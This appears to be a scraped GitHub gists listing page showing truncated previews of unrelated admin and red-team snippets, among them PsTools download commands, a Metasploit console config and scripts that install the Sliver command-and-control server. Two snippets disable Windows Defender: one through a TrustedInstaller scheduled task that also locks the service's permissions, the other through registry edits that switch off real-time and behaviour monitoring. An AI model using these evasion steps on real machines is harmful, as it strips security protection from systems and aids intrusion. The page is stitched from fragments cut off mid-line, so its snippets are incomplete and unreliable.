This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
caller_name = inspect.stack()[1].function | |
file_name = inspect.stack()[1].filename | |
line_number = inspect.stack()[1].lineno | |
self.logger.debug(f"Called from function: {caller_name} in file {file_name} at line {line_number}") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Create PS folder on C: drive | |
New-Item -ItemType Directory -Force -Path "C:\PS" | |
# Set TLS versions for download (it will error otherwise) | |
[Net.ServicePointManager]::SecurityProtocol = "tls12, tls11, tls" | |
# Download PsTools | |
Invoke-WebRequest -Uri "https://download.sysinternals.com/files/PSTools.zip" -OutFile "C:\PS\PSTools.zip" | |
# Extract PsTools to the PS folder | |
Expand-Archive -Path "C:\PS\PSTools.zip" -DestinationPath "C:\PS" | |
# Auto Accept EULA, can also run psexec with -accepteula | |
#reg ADD HKCU\Software\Sysinternals\PSexec /v EulaAccepted /t REG_DWORD /d 1 /f |
Some golden links when you are having issues: https://social.technet.microsoft.com/Forums/windows/en-US/96016a13-9062-4842-b534-203d2f400cae/ca-certificate-request-error-quotdenied-by-policy-module-0x80094800quot-windows-server-2008?forum=winserversecurity
Download and install Certi
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[framework/core] | |
PROMPT=%whi[%T] %red(%L) %yel%J %grn%S%whi | |
TimestampOutput=true | |
ConsoleLogging=true | |
SessionLogging=true | |
[framework/features] | |
[framework/ui/console] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
FILE=/etc/systemd/system/sliver-server.service | |
if [ ! -f "$FILE" ];then | |
sudo echo "[Unit] | |
Description=Sliver Server | |
[Service] | |
Type=simple | |
ExecStart=/usr/local/bin/sliver-server" > $FILE |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "Stopping sliver service (if it exists)" | |
sudo service sliver-server stop 2>/dev/null | |
echo "Removing old files (if they exist)" | |
[ ! -e file ] || rm sliver-client_linux.zip sliver-server_linux.zip | |
[ ! -e file ] || rm sliver-client sliver-server | |
echo "Downloading latest sliver linux releases" | |
wget -q "https://github.com/BishopFox/sliver/releases/latest/download/sliver-client_linux.zip" | |
wget -q "https://github.com/BishopFox/sliver/releases/latest/download/sliver-server_linux.zip" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
$svc = New-Object -ComObject 'Schedule.Service' | |
$svc.Connect() | |
$user = 'NT SERVICE\TrustedInstaller' | |
$folder = $svc.GetFolder('\') |
:: Turn Off Windows Defender
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
:: Cloud-protection level
NewerOlder